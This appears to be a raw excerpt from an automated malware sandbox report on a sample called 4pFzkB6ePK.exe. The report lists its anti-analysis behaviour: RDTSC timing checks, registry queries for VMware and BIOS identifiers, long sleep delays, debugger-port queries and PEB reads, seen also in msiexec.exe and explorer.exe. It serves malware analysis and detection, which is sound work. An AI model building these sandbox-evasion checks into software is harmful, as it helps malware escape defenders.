              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000000CD85E4 second address: 0000000000CD85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 0000000000CD896E second address: 0000000000CD8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_004088A0 rdtsc
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exe TID: 6488Thread sleep time: -103855s >= -30000s
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exe TID: 6528Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\explorer.exe TID: 6696Thread sleep time: -40000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6436Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: 4pFzkB6ePK.exe, 00000002.00000002.233013059.00000000083F5000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: explorer.exe, 00000006.00000000.252565656.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: explorer.exe, 00000006.00000000.252565656.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: explorer.exe, 00000006.00000000.251608413.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: explorer.exe, 00000006.00000000.252167795.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: explorer.exe, 00000006.00000000.244556737.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
              Source: msiexec.exe, 0000000B.00000002.474888659.000000000322B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: explorer.exe, 00000006.00000000.252565656.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
              Source: explorer.exe, 00000006.00000000.252565656.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: explorer.exe, 00000006.00000000.252683584.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
              Source: explorer.exe, 00000006.00000002.488112370.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
              Source: explorer.exe, 00000006.00000002.471816692.0000000001398000.00000004.00000020.sdmpBinary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&I
              Source: explorer.exe, 00000006.00000000.251608413.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: explorer.exe, 00000006.00000000.251608413.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: 4pFzkB6ePK.exe, 00000002.00000002.233013059.00000000083F5000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware9XBLNAE2Win32_VideoControllerLB3K12PUVideoController120060621000000.000000-00067325669display.infMSBDAV6AP371YPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsPHALFHV_
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: 4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: explorer.exe, 00000006.00000000.251608413.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_004088A0 rdtsc
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_00409B10 LdrLoadDll,
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962990 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A005AC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A005AC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196FD9B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196FD9B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196A185 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195C182 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962581 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01932D8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01932D8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01932D8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01932D8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01932D8A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01961DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01961DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01961DB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B51BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B51BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B51BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B51BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019661A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019661A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019635A1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B69A6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6DC9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019E8DF1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193B1E1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019C41E8 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194D5E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194D5E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FFDE2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FFDE2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FFDE2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FFDE2 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01939100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01939100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01939100 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A08D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01943D34 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193AD30 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019FE539 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196513A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019BA537 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964D3B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01954120 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01957D50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195B944 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01973D43 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B3540 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193B171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193B171 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195C577 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195C577 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0193C962 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194849B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01939080 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B3884 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B3884 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196F0BF mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196F0BF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019620A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019790AF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CB8D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F14FB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6CF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6CF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6CF0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A08CD6 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019358EC mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7016 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6C0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6C0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6C0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B6C0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F1C06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A0740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A0740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A0740D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A04015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A04015 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196BC2C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196002D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0194B02A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01950050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01950050 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CC450 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019CC450 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A01074 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196A44B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F2073 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0195746D mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01948794 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01962397 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01A05BA5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_0196B390 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7794 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7794 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B7794 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019F138A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01941B8F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01941B8F mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019ED380 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_01964BAD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B53CA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019B53CA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019737F5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeCode function: 5_2_019603E2 mov eax, dword ptr fs:[00000030h]
